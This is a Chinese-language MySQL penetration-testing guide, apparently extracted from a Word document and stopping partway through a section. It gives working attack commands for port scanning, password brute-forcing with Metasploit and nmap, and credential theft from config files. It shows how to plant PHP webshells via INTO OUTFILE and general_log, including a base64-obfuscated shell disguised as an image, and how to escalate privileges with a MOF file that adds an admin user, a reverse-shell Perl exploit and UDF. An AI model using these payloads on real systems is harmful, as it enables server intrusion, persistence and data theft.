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/>
          <w:color w:val="333333"/>
          <w:spacing w:val="8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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数据库是目前世界上使用最为广泛的数据库之一，很多著名公司和站点都使用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作为其数据库支撑，目前很多架构都以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作为数据库管理系统，例如LAMP、和WAMP等，在针对网站渗透中，很多都是跟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数据库有关，各种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注入，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提权，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数据库root账号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webshell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获取等的，但没有一个对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数据库渗透较为全面对总结，针对这种情况我们开展了研究，虽然我们团队今年正在出版《网络攻防实战研究——漏洞利用与提权》，但技术的进步有无止境，思想有多远，路就可以走多远，在研究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数据库安全之余，对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如何通过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msf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、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sqlmap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等来进行扫描、漏洞利用、提权、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密码破解和获取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webshell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等进行了详细研究。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400"/>
        <w:jc w:val="left"/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7"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr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7"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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7"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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7"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>信息收集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1.端口信息收集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默认端口是3306端口，但也有自定义端口，针对默认端口扫描主要利用扫描软件进行探测，推荐使用：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C304D5" w:rsidRPr="00C304D5" w:rsidRDefault="00C304D5" w:rsidP="00C304D5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C304D5" w:rsidRPr="00C304D5" w:rsidRDefault="00C304D5" w:rsidP="00C304D5">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:ind w:left="600" w:hanging="360"/>
        <w:jc w:val="left"/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</w:pPr>
      <w:proofErr w:type="spellStart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iisputter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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，直接填写3306端口，IP地址填写单个或者C段地址。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C304D5" w:rsidRPr="00C304D5" w:rsidRDefault="00C304D5" w:rsidP="00C304D5">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:ind w:left="600" w:hanging="360"/>
        <w:jc w:val="left"/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</w:pPr>
      <w:proofErr w:type="spellStart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nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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扫描</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> -p 3306 192.168.1.1-254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特定目标的渗透，可能需要对全端口进行扫描，可以使用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Nmap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对某一个IP地址进行全端口扫描，端口扫描软件还有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sfind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等DOS下扫描的工具。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2.版本信息收集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（1）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msf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查看版本信息auxiliary/scanner/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/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mysql_version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模块，以扫描主机192.168.157.130为例，命令为：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use auxiliary/scanner/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mysql_version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set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rhosts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192.168.157.130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run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(2）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查询版本命令：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SELECT @@version`、`SELECT version();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(3)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sqlmap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通过注入点扫描确认信息：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sqlmap.py -u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url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--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dbms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</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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（4）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phpmyadmin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管理页面登录后查看localhost-&gt;变量-&gt;服务器变量和设置中的version参数值。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3.数据库管理信息收集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管理工具有多种，例如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phpmyadmin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网站管理，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Navicat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 xml:space="preserve"> for MySQL以及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MysqlFront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等客户端工具。这些工具有的会直接保存配置信息，这些信息包含数据库服务器地址和数据库用户名以及密码，通过</w:t>
      </w:r>
      <w:proofErr w:type="gram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嗅探或者</w:t>
      </w:r>
      <w:proofErr w:type="gram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破解配置文件可以获取密码等信息。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lastRenderedPageBreak/>
        <w:t>4.msf信息收集模块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（1）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proofErr w:type="gram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哈希值枚举</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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use auxiliary/scanner/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mysql_hashdump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set username root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set password root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run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（2）获取相关信息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use auxiliary/admin/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mysql_enum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set username root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set password root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run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获取数据库版本，操作系统名称，架构，数据库目录，数据库用户以及密码哈希值。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（3）执行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语句，连接成功后可以在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msf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执行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语句，跟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sqlmap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的–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-shell模块类似。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use auxiliary/admin/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mysql_sql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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（4）将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mysql_schem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导出到本地 /root/.msf4/loot/文件夹下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7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use auxiliary/scanner/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mysql_schemadump</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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（5）文件枚举和目录可写信息枚举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9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auxiliary/scanner/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mysql_file_enum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auxiliary/scanner/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mysql_writable_dirs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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没有测试成功过，需要定义枚举目录和相关文件，觉得基本没有啥用。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400"/>
        <w:jc w:val="left"/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7"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr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7"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>1.2Mysql密码获取</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C304D5" w:rsidRPr="00C304D5" w:rsidRDefault="00C304D5" w:rsidP="00C304D5">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="270" w:lineRule="atLeast"/>
        <w:ind w:firstLine="400"/>
        <w:jc w:val="left"/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</w:pPr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  <w:t>1.2.1暴力破解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lastRenderedPageBreak/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暴力破解主要有几种：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1.网页在线连接破解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可以使用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burpsuite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和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phpMyAdmin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多线程批量破解工具。 下载： https://portswigger.net/burp/、 http://pan.baidu.com/s/1c1LD6co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2.msf通过命令行进行暴力破解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msf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破解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密码模块auxiliary/scanner/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/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mysql_login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，其参数主要有BLANK_PASSWORDS、BRUTEFORCE_SPEED、DB_ALL_CREDS、DB_ALL_PASS、DB_ALL_USERS、PASSWORD、PASS_FILE、Proxies、RHOSTS、RPORT、STOP_ON_SUCCESS、THREADS、USERNAME、USERPASS_FILE、USER_AS_PASS、USER_FILE、VERBOSE参数。对单一主机仅仅需要设置RHOSTS、RPORT、USERNAME、PASSWORD和PASS_FILE，其它参数根据实际情况进行设置。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（1）场景A：对内网获取root某一个口令后，扩展渗透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use auxiliary/scanner/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mysql_login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set RHOSTS 192.168.157.1-254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set password root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set username root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run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执行后对192.168.157.1-254进行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密码扫描验证。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（2）场景B：使用密码字典进行扫描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use auxiliary/scanner/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mysql_login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set RHOSTS 192.168.157.1-254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set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pass_file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tmp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/password.txt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set username root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run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3.使用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nmap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扫描并破解密码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（1）对某一个IP或者IP地址段进行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nmap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默认密码暴力破解并扫描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nmap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--script=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-brute 192.168.157.130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lastRenderedPageBreak/>
              <w:t>nmap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--script=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-brute 192.168.157.1-254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lastRenderedPageBreak/>
        <w:t>（2）使用root账号root密码进行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密码验证并扫描获取指定IP地址的端口信息以及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数据库相关信息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nmap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-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sV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--script=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-databases --script-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argsmysqluser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=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root,mysqlpass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=root 192.168.157.130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（3）检查root空口令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nmap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--script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-empty-password 192.168.195.130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4.使用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hscan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工具对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口令进行扫描，需要设置扫描IP地址段以及数据库口令字典及用户名字典。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C304D5" w:rsidRPr="00C304D5" w:rsidRDefault="00C304D5" w:rsidP="00C304D5">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="270" w:lineRule="atLeast"/>
        <w:ind w:firstLine="400"/>
        <w:jc w:val="left"/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</w:pPr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  <w:t>1.2.2源代码泄露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1.网站源代码备份文件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一些网站源代码文件中会包含数据库连接文件，通过查看这些文件可以获取数据库账号和密码。一般常见的数据库连接文件为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config.php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、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web.config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、conn.asp、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db.php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/asp、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jdbc.properties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、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sysconfig.properties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、JBOSS_HOME\docs\examples\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jca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\XXXX-ds.xml。以前有一款工具挖掘鸡可以自定义网站等名称对zip/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rar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/tar/tar.gz/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gz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/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等后缀文件进行扫描。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2.配置备份文件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使用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ultraedit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等编辑文件编辑数据库配置文件后，会留下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bak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文件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C304D5" w:rsidRPr="00C304D5" w:rsidRDefault="00C304D5" w:rsidP="00C304D5">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="270" w:lineRule="atLeast"/>
        <w:ind w:firstLine="400"/>
        <w:jc w:val="left"/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</w:pPr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  <w:t>1.2.3文件包含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本地文件包含漏洞可以包含文件，通过查看文件代码获取数据库配置文件，进而读取数据库用户名和密码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C304D5" w:rsidRPr="00C304D5" w:rsidRDefault="00C304D5" w:rsidP="00C304D5">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="270" w:lineRule="atLeast"/>
        <w:ind w:firstLine="400"/>
        <w:jc w:val="left"/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</w:pPr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  <w:t>1.2.4其它情况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有些软件会将IP地址、数据库用户名和密码写进程序中，运行程序后，通过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cain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软件进行嗅探，可以获取数据库密码。另外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客户端管理工具有的管理员会建立连接记录，这些连接记录保存了用户名、密码和连接IP地址或者主机名，通过配置文件或者</w:t>
      </w:r>
      <w:proofErr w:type="gram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嗅探可以</w:t>
      </w:r>
      <w:proofErr w:type="gram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获取用户名和密码。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400"/>
        <w:jc w:val="left"/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7"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr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7"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>1.3Mysql获取</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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7"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00C304D5" w:rsidRPr="00C304D5" w:rsidRDefault="00C304D5" w:rsidP="00C304D5">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="270" w:lineRule="atLeast"/>
        <w:ind w:firstLine="400"/>
        <w:jc w:val="left"/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</w:pPr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  <w:t>1.3.1phpmyadminroot账号获取</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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  <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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MysqlRoot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账号通过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phpMyAdmin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获取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webshell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的思路，主要有下面几种方式，以第一二六八种方法较佳，其它可以根据实际情况来进行。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1.直接读取后门文件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lastRenderedPageBreak/>
        <w:t>通过程序报错、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phpinfo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函数、程序配置表等直接获取网站真实路径，有些网站前期已经被人渗透过，因此在目录下留有后门文件通过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load_file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直接读取。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2.直接导出一句话后门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前提需要知道网站的真实物理路径，例如呼求偶真实路径D:\work\WWW，则可以通过执行以下查询，来获取一句话后门文件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cmd.php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，访问地址 http://www.somesite.com/cmd.php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select '&lt;?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php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@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eval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($_POST[antian365]);?&gt;'INTO OUTFILE 'D:/work/WWW/antian365.php'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3.创建数据库导出一句话后门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在查询窗口直接执行以下代码即可，跟2.原理类似。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CREATE TABLE `mysql`.`antian365` (`temp` TEXT NOTNULL );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INSERT INTO `mysql`.`antian365` (`temp` ) VALUES('&lt;?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php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@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eval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($_POST[antian365]);?&gt;');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SELECT `temp` FROM `antian365` INTO OUTFILE'D:/www/antian365.php';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DROP TABLE IF EXISTS `antian365`;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4.可执行命令方式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创建执行命令形式的shell，但前提是对方未关闭系统函数。该方法导出成功后可以直接执行DOS命令，使用方法:www.xxx.com/antian365.php?cmd=(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cmd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=后面直接执行dos</w:t>
      </w:r>
      <w:proofErr w:type="gram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命令)。</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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select '&lt;?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php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echo \'&lt;pre&gt;\';system($_GET[\'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cmd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\']); echo \'&lt;/pre&gt;\'; ?&gt;' INTO OUTFILE 'd:/www/antian365.php'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另外在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linux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下可以导出直接执行命令的shell：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lastRenderedPageBreak/>
              <w:t>SELECT '&lt;? system($_GET[\'c\']); ?&gt;' INTO OUTFILE '/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var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/www/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shell.php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';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http://localhost/shell.php?c=cat%20/etc/passwd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5.过杀毒软件方式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通过后台或者存在上</w:t>
      </w:r>
      <w:proofErr w:type="gram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传图片</w:t>
      </w:r>
      <w:proofErr w:type="gram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的地方，上</w:t>
      </w:r>
      <w:proofErr w:type="gram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传图片</w:t>
      </w:r>
      <w:proofErr w:type="gram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publicguide.jpg，内容如下：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&lt;?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php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$a=' PD9waHAgQGV2YWwoJF9QT1NUWyd hbnRpYW4zNjUnXSk7ZGllKCk7Pz4= ';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error_reporting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(0);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@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set_time_limit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(0);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eval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("?&gt;".base64_decode($a));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?&gt;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然后通过图片包含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temp.php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，导出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webshell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。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select '&lt;?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php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include 'publicguide.jpg' ?&gt;'INTO OUTFILE 'D:/work/WWW/antian365.php'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一句话后门密码：antian365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6.直接导出加密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webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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一句话后门文件密码：pp64mqa2x1rnw68，执行以下查询直接导出加密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webshell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，D:/WEB/IPTEST/22.php，注意在实际过程需要修改D:/WEB/IPTEST/22.php。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注意：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也可以使用 http://tool.lu/hexstr/ 网站的代码转换来实现，将需要导出的文件代码复制到网站的字符串中，通过字符串转成十六进制，将十六进制字符串放入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unhex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函数进行查询即可：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select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unhex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('十六进制字符串') into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dumpfile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'D:/WEB/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shell.php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'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7.CMS系统获取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webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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lastRenderedPageBreak/>
        <w:t>有些情况下无法获取网站的真实路径，则意味着无法直接导出一句话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webshell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，可以通过CMS系统管理账号登录系统后，寻找漏洞来突破，例如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dedecms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则可以通过破解管理员账号后直接上传文件来获取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webshell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。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Discuz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！的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UC_key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可以直接获取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webshell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。甚至某些系统可以直接上传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php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文件。下面是一些CMS系统渗透的技巧：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C304D5" w:rsidRPr="00C304D5" w:rsidRDefault="00C304D5" w:rsidP="00C304D5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C304D5" w:rsidRPr="00C304D5" w:rsidRDefault="00C304D5" w:rsidP="00C304D5">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:ind w:left="600" w:hanging="360"/>
        <w:jc w:val="left"/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</w:pPr>
      <w:proofErr w:type="spellStart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dedecms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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系统的密码有直接md5，也有20位的密码，如果是20位的密码则需要去掉密码中的前3位和最后1位，然后对剩余的值进行md5解密即可；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C304D5" w:rsidRPr="00C304D5" w:rsidRDefault="00C304D5" w:rsidP="00C304D5">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:ind w:left="600" w:hanging="360"/>
        <w:jc w:val="left"/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</w:pPr>
      <w:proofErr w:type="spellStart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phpcms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> v9版本的密码需要加salt进行破解，需要选择破解算法md5(md5($pass).$salt)进行破解。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C304D5" w:rsidRPr="00C304D5" w:rsidRDefault="00C304D5" w:rsidP="00C304D5">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:ind w:left="600" w:hanging="360"/>
        <w:jc w:val="left"/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</w:pPr>
      <w:proofErr w:type="spellStart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Discuz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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！论坛</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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帐号</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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保存在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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ucenter_members</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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（Discuz7.X及以上版本）或者</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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cdb_members</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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（discuz6.x版本）表中，其破解需要带salt进行，其破解时是使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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password:salt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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进行，例如a0513df9929afc972f024fa4e586e829:399793。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8.general_log_file获取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webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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（1）查看genera文件配置情况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show global variables like "%genera%";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（2）关闭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general_log</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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set global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general_log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=off;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（3）通过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general_log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选项来获取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webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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5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set global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general_log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='on';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SET global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general_log_file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='D:/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phpStudy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/WWW/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cmd.php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';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在查询中执行语句：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SELECT '&lt;?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php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assert($_POST["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cmd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"]);?&gt;';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Shell为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cmd.php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，一句话后门，密码为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cmd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。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C304D5" w:rsidRPr="00C304D5" w:rsidRDefault="00C304D5" w:rsidP="00C304D5">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="270" w:lineRule="atLeast"/>
        <w:ind w:firstLine="400"/>
        <w:jc w:val="left"/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</w:pPr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  <w:lastRenderedPageBreak/>
        <w:t>1.3.2sqlmap注入点获取</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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  <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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sqlmap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注入点获取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webshell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的前提是具备写权限，一般是root账号，通过执行命令来获取：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sqlmap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-u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url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--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os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-shell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echo "&lt;?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php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@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eval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($_POST['c']);?&gt;" &gt;/data/www/1.php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400"/>
        <w:jc w:val="left"/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7"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr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7"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>1.4Mysql提权</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C304D5" w:rsidRPr="00C304D5" w:rsidRDefault="00C304D5" w:rsidP="00C304D5">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="270" w:lineRule="atLeast"/>
        <w:ind w:firstLine="400"/>
        <w:jc w:val="left"/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</w:pPr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  <w:t>1.4.1mof提权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1.Webshell上传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mof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文件提权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 Root权限MOF</w:t>
      </w:r>
      <w:proofErr w:type="gram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方法提权是</w:t>
      </w:r>
      <w:proofErr w:type="gram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来自国外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Kingcope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大</w:t>
      </w:r>
      <w:proofErr w:type="gram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牛发布</w:t>
      </w:r>
      <w:proofErr w:type="gram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的MySQL Scanner &amp; MySQL Server for Windows Remote SYSTEM Level Exploit( https://www.exploit-db.com/exploits/23083/)，简称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proofErr w:type="gram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远程提权</w:t>
      </w:r>
      <w:proofErr w:type="gram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0day(MySQL Windows Remote System Level Exploit (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Stuxnet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 xml:space="preserve"> technique) 0day)。Windows 管理规范 (WMI) 提供了以下三种方法编译到 WMI 存储库的托管对象格式 (MOF) 文件：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方法1：运行 MOF 文件指定为命令行参数 Mofcomp.exe 文件。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方法2：使用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IMofCompiler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接口和 $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CompileFile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方法。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方法3：拖放到 %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SystemRoot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%\System32\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Wbem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\MOF 文件夹的 MOF 文件。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Microsoft 建议您到存储库编译 MOF 文件使用前两种方法。也就是运行 Mofcomp.exe 文件，或使用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IMofCompiler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::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CompileFile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方法。第三种方法仅为向后兼容性与早期版本的?WMI提供，并因为此功能可能不会提供在将来的版本后，不应使用。注意使用MOF</w:t>
      </w:r>
      <w:proofErr w:type="gram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方法提权的</w:t>
      </w:r>
      <w:proofErr w:type="gram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前提是当前Root</w:t>
      </w:r>
      <w:proofErr w:type="gram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帐号</w:t>
      </w:r>
      <w:proofErr w:type="gram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可以复制文件到%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SystemRoot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%\System32\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Wbem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\MOF目录下，否则会失败！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该漏洞的利用前提条件是必须具备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的root权限，在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Kingcope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公布的0day中公布了一个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pl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利用脚本。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perl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mysql_win_remote.pl 192.168.2.100 root "" 192.168.2.150 5555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lastRenderedPageBreak/>
        <w:t>192.168.2.100为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数据库所在服务器，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口令为空，反弹到192.168.2.150的5555端口上。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2.生成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nullevt.mof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文件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将以下代码保存为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nullevt.mof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文件：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8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#pragma namespace("\\\\.\\root\\subscription")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instance of __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EventFilter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as $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EventFilter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{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EventNamespace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= "Root\\Cimv2";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Name = "filtP2";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Query = "Select \ From __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InstanceModificationEvent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"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"Where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TargetInstance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Isa \"Win32_LocalTime\" "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"And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TargetInstance.Second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= 5";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QueryLanguage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= "WQL";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};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instance of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ActiveScriptEventConsumer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as $Consumer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{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Name = "consPCSV2";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ScriptingEngine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= "JScript";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ScriptText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=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"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var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WSH = new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ActiveXObject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(\"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WScript.Shell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\")\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nWSH.run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(\"net.exe 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lastRenderedPageBreak/>
              <w:t xml:space="preserve">user admin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admin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/add")";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};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instance of __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FilterToConsumerBinding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{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Consumer = $Consumer;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Filter = $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EventFilter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;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};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lastRenderedPageBreak/>
        <w:t>3.通过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查询将文件导入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执行以下查询语句，将上面生成的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nullevt.mof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导入到c:\windows\system32\wbem\mof\目录下在windows7中默认是拒绝访问的。导入后系统会自动运行，执行命令。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6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selectload_file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('C:\\RECYCLER\\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nullevt.mof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') into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dumpfile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'c:/windows/system32/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wbem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mof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nullevt.mof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';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270" w:lineRule="atLeast"/>
        <w:ind w:firstLine="400"/>
        <w:jc w:val="left"/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</w:pPr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  <w:t>1.4.2.Msf直接</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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  <w:t>mof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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  <w:t>提权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Msf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下的exploit/windows/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/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mysql_mof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模块提供了直接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Mof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提权，不过该漏洞成功跟操作系统权限和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数据库版本有关，执行成功后会直接反弹shell到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meterpreter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。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use exploit/windows/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mysql_mof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set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rhost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192.168.157.1 //设置</w:t>
            </w:r>
            <w:proofErr w:type="gram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需要提权的</w:t>
            </w:r>
            <w:proofErr w:type="gram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远程主机IP地址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set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rport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3306 //设置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的远程端口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set password root //设置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数据库root密码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set username root //设置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用户名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lastRenderedPageBreak/>
              <w:t>options //查看设置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run 0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lastRenderedPageBreak/>
        <w:t>技巧：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要是能够通过网页连接管理（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phpmyadmin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），则可以修改host为%并刷新权限后，则可以通过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msf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等工具远程连接数据库。默认root等账号不允许远程连接，除非管理员或者数据库用户自己设置。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方法1：本地登入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，更改?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数据库里的?</w:t>
      </w:r>
      <w:proofErr w:type="gram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user?表里的</w:t>
      </w:r>
      <w:proofErr w:type="gram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?host项，将localhost改为%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use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update user set host = '%' where user = 'root';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FLUSH PRIVILEGES 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select host, user from user;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方法2：直接授权(推荐)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从任何主机上使用root用户，密码：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youpassword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（你的root密码）连接到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服务器：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#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-u root -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proot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GRANT ALL PRIVILEGES ON . TO 'root'@'%' IDENTIFIED BY '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youpassword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' WITH GRANT OPTION;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FLUSH PRIVILEGES;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推荐重新增加一个用户，在实际测试过程中发现很多服务器使用root配置了多个地址，修改后可能会影响实际系统的运行。在实际测试过程中因此建议新增一个用户，授权所有权限，而不是直接更改root配置。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C304D5" w:rsidRPr="00C304D5" w:rsidRDefault="00C304D5" w:rsidP="00C304D5">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="270" w:lineRule="atLeast"/>
        <w:ind w:firstLine="400"/>
        <w:jc w:val="left"/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</w:pPr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  <w:t>1.4.3UDF提权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UDF</w:t>
      </w:r>
      <w:proofErr w:type="gram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提权是</w:t>
      </w:r>
      <w:proofErr w:type="gram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利用MYSQL的自定义函数功能，将MYSQL账号转化为系统system权限，其利用条件是目标系统是Windows(Win2000,XP,Win2003)；拥有MYSQL的某个用户账号，此账号必须有对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的insert和delete权限以创建和抛弃函数,有root账号密码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Windows下UDF</w:t>
      </w:r>
      <w:proofErr w:type="gram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提权对于</w:t>
      </w:r>
      <w:proofErr w:type="gram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Windows2008以下服务器比较适用，也即针对Windows2000、Windows2003的成功率较高。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lastRenderedPageBreak/>
        <w:t>1.UDF</w:t>
      </w:r>
      <w:proofErr w:type="gram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提权条件</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00C304D5" w:rsidRPr="00C304D5" w:rsidRDefault="00C304D5" w:rsidP="00C304D5">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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C304D5" w:rsidRPr="00C304D5" w:rsidRDefault="00C304D5" w:rsidP="00C304D5">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:ind w:left="600" w:hanging="360"/>
        <w:jc w:val="left"/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</w:pPr>
      <w:proofErr w:type="spellStart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Mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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版本大于5.1版本udf.dll文件必须放置于MYSQL安装目录下的lib\plugin文件夹下。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C304D5" w:rsidRPr="00C304D5" w:rsidRDefault="00C304D5" w:rsidP="00C304D5">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:ind w:left="600" w:hanging="360"/>
        <w:jc w:val="left"/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</w:pPr>
      <w:proofErr w:type="spellStart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Mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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版本小于5.1版本。udf.dll文件在Windows2003下放置于c:\windows\system32，在windows2000下放置于c:\winnt\system32。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C304D5" w:rsidRPr="00C304D5" w:rsidRDefault="00C304D5" w:rsidP="00C304D5">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:ind w:left="600" w:hanging="360"/>
        <w:jc w:val="left"/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</w:pPr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掌握的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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数据库的账号有对</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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的insert和delete权限以创建和抛弃函数，一般以root账号为佳，具备`root账号所具备的权限的其它账号也可以。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C304D5" w:rsidRPr="00C304D5" w:rsidRDefault="00C304D5" w:rsidP="00C304D5">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:ind w:left="600" w:hanging="360"/>
        <w:jc w:val="left"/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</w:pPr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可以将udf.dll写入到相应目录的权限。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2.</w:t>
      </w:r>
      <w:proofErr w:type="gram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提权方法</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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（1）获取数据库版本、数据位置以及插件位置等信息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select version();//获取数据库版本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select user();//获取数据库用户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select @@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basedir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;//获取安装目录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show variables like '%plugins%'; //寻找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安装路径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（2）导出路径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C:\Winnt\udf.dll Windows 2000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C:\Windows\udf.dll Windows2003（有的系统被转义，需要改为C:Windowsudf.dll）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 5.1以上版本，必须要把udf.dll文件放到MYSQL安装目录下的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libplugin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文件夹下才能创建自定义函数。该目录默认是不存在的，这就需要我们使用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webshell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lastRenderedPageBreak/>
        <w:t>找到MYSQL的安装目录，并在安装目录下创建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libplugin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文件夹，然后将udf.dll文件导出到该目录即可。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在某些情况下，我们会遇到Can</w:t>
      </w:r>
      <w:proofErr w:type="gram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’</w:t>
      </w:r>
      <w:proofErr w:type="gram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t open shared library的情况，这时就需要我们把udf.dll导出到lib\plugin目录下才可以，网上大</w:t>
      </w:r>
      <w:proofErr w:type="gram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牛发现</w:t>
      </w:r>
